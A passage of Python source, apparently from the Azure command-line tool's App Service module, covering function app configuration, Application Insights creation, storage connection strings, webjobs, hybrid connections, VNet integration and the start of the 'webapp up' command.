value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnet_id_parts = parse_resource_id(subnet_resource_id)
subnet_subscription_id = subnet_id_parts['subscription']
vnet_name = subnet_id_parts['name']
vnet_resource_group = subnet_id_parts['resource_group']
subnet_name = subnet_id_parts['child_name_1']
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
from azure.cli.core.commands.client_factory import get_subscription_id
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
return_vnet = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_swift_virtual_network_connection', slot, swiftVnet)
# Enalbe Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, loc, os_name, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
